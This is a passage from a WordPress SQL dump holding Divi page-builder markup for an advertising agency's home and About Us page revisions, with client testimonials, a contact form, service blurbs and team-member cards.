_builder_version=\"4.5.6\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"P Sarvanan\" job_title=\"Managing Director\" company_name=\"Andslite\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-4.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]<p>“Excellent support and proactiviness and hunger to execute the project with novel ideas make me an all time client .”</p>[/et_pb_testimonial][et_pb_testimonial author=\"Mrityunjaya\" job_title=\"Marketing Head\" company_name=\"Renefurterer\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“They are superb in planning and graphic designing. I feel comfortable, narrating the ideas, as their interest level and curiosity excite me to do brilliant work..”[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Amit Rathod\" job_title=\"Marketing Manager\" company_name=\"Deutsche Bank\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“I always feel excited with the young and energetic team of WTH, I love the innovative creative ideas they bring to every project, I share with them..”[/et_pb_testimonial][et_pb_testimonial author=\"Sandeep\" job_title=\"Marketing\" company_name=\"Yamaha Motor Company\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“It is always an exciting journey to work with team WTH and I am glad to share my experience that they are outstanding, in terms of understanding the brief and executing it as per our business need. Best Digital Agency”[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2021-03-18 06:26:28','2021-03-18 06:26:28','',134,'https://wthtest1.in8.cdn-alpha.com/134-revision-v1/',0,'revision','',0),(778,1,'2021-03-18 06:30:04','2021-03-18 06:30:04','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"4.5.6\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"20px|0px|0px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"\" content_last_edited=\"on|phone\" _builder_version=\"4.5.6\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"9px\" text_font_size_last_edited=\"on|phone\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"4.5.6\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg\" parallax=\"on\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\" alt=\"about us whatthehell\" title_text=\"whatthehell about us\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Build Brand Equity</h2>\n<p>Our advertising and marketing startegies are aligned towards the core objectives of the business operation of sustainable sales leading to profit and building brand equity as long term asset creation for the businesses.</p>\n<p><span style=\"font-size: 16px;\">There is a need to understand the various phases of businesses &amp; invest in marketing (Sales or Brand Building) in the required proportion. As per the budget of the business we can align our marketing and advertising strategies into aggressive disruptive to guerilla or safe. As the successful advertising and marketing require patience and balancing various market forces to help your business thrust to an upward direction.</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"56px||56px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"56px|0px|56px|0px|false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>With the advent to this digital era, <strong>Unique traffic to your website</strong>, is becoming the key battle point. Targeting the appropriate TG and reaching to them at the right place and the moment can help you earn them for lifetime.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||56px||false|false\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"4.5.2\" custom_padding=\"56px||56px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We do not fear trying new stuff and failure (we say learning). Meet the <span>team of professionals enjoying their work and adding value to your project.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Dhiraj Kumar\" position=\"Founder\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-6-1.jpg\" linkedin_url=\"https://www.linkedin.com/in/dhirajwth\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Shubham Jha\" position=\"Marketing Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-2.jpg\" facebook_url=\"#\" linkedin_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Sachin\" position=\"Art Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-7.jpg\" facebook_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"56px||56px|||\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" 